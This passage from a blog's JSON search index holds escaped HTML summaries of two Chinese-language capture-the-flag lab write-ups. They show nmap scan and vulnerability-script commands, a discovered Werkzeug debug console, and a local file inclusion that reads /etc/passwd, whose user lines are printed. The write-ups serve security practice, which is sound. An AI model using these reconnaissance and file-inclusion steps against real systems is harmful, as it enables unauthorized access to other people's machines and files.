id=\"端口扫描\"\u003e端口扫描\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zeug_image_3.png\" alt=\"HMM_zeug_image_3\" /\u003e\u003cfigcaption\u003eHMM_zeug_image_3\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zeug_image_4.png\" alt=\"HMM_zeug_image_4|700\" /\u003e\u003cfigcaption\u003eHMM_zeug_image_4|700\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zeug_image_5.png\" alt=\"HMM_zeug_image_5|550\" /\u003e\u003cfigcaption\u003eHMM_zeug_image_5|550\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zeug_image_6.png\" alt=\"HMM_zeug_image_6|600\" /\u003e\u003cfigcaption\u003eHMM_zeug_image_6|600\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zeug_image_7.png\" alt=\"HMM_zeug_image_7\" /\u003e\u003cfigcaption\u003eHMM_zeug_image_7\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"ftp-匿名登录\"\u003eFTP 匿名登录\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zeug_image_8.png\" alt=\"HMM_zeug_image_8\" /\u003e\u003cfigcaption\u003eHMM_zeug_image_8\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/workspace cat README.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eHi, Cosette, don\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;t forget to disable the debug mode in the web application, we don\u0026#39;\u003c/span\u003et want security breaches.\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e提示有一个 debug 页面可以利用\u003c/p\u003e\n\u003ch2 id=\"web-侦查\"\u003eweb 侦查\u003c/h2\u003e\n\u003cp\u003e进去之后是一个上传文件的页面, 先去搜了一下 cve, 因为不确定 cms 名称啥的,\n后面搜到了 console 目录, 然后访问了 console 目录, 才确定这是 Werkzeug\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zeug_image_9.png\" alt=\"HMM_zeug_image_9|900\" /\u003e\u003cfigcaption\u003eHMM_zeug_image_9|900\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n这里的 cve 用不了\n想着来目录扫描一下\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zeug_image_10.png\" alt=\"HMM_zeug_image_10|550\" /\u003e\u003cfigcaption\u003eHMM_zeug_image_10|550\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e","tags":["sec"],"title":"zeug_hard"},{"date":"2024-02-09","permalink":"https://l1uyun.one/posts/hmv_quick2/","summary":"\u003cp\u003e启动靶机前\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick2_image_1.png\" alt=\"HMM_quick2_image_1|700\" /\u003e\u003cfigcaption\u003eHMM_quick2_image_1|700\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n启动后\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick2_image_2.png\" alt=\"HMM_quick2_image_2|650\" /\u003e\u003cfigcaption\u003eHMM_quick2_image_2|650\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n192.168.10.4\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick2_image_3.png\" alt=\"HMM_quick2_image_3|600\" /\u003e\u003cfigcaption\u003eHMM_quick2_image_3|600\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n2024-02-14-20:18:39\n后面都是直接用 arp-scan 来扫描某一个网卡的下的局域网ip 了\u003c/p\u003e\n\u003ch2 id=\"端口扫描\"\u003e端口扫描\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick2_image_4.png\" alt=\"HMM_quick2_image_4|700\" /\u003e\u003cfigcaption\u003eHMM_quick2_image_4|700\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo nmap 192.168.10.4 -p22,80 -Pn -sT -sV -O -sC -oA  portscan/nmap\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick2_image_5.png\" alt=\"HMM_quick2_image_5|750\" /\u003e\u003cfigcaption\u003eHMM_quick2_image_5|750\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo nmap 192.168.10.4 -sT -Pn -p20,80 --script\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003evuln -oA  portscan/vuln\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick2_image_6.png\" alt=\"HMM_quick2_image_6|700\" /\u003e\u003cfigcaption\u003eHMM_quick2_image_6|700\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"web-服务\"\u003eweb 服务\u003c/h2\u003e\n\u003cp\u003e主页里面在端口扫描的时候发现有一个参数 page\n尝试 local file include LFI\n获取到了/etc/passwd\n在 home 目录下有文件夹的有这两个用户\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eandrew:x:1000:1000: Andrew Speed:/home/andrew:/bin/bash\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enick:x:1001:1001: Nick Greenhorn,,,:/home/nick:/bin/bash\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e获得了 user. txt\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick2_image_7.png\" alt=\"HMM_quick2_image_7|500\" /\u003e\u003cfigcaption\u003eHMM_quick2_image_7|500\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick2_image_8.png\" alt=\"HMM_quick2_image_8|483\" /\u003e\u003cfigcaption\u003eHMM_quick2_image_8|483\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e进行目录扫描 ferox 发现失效了, 以后还是先尝试 gobuster, 不行的话再 feroxbuster\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick2_image_9.png\" alt=\"HMM_quick2_image_9|750\" /\u003e\u003cfigcaption\u003eHMM_quick2_image_9|750\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n进入 file. php 页面\u003c/p\u003e","tags":["sec"],"title":"quick2"},{"date":"2023-11-23","permalink":"https://l1uyun.one/search/","summary":"","tags":null,"title":"Search Results"}]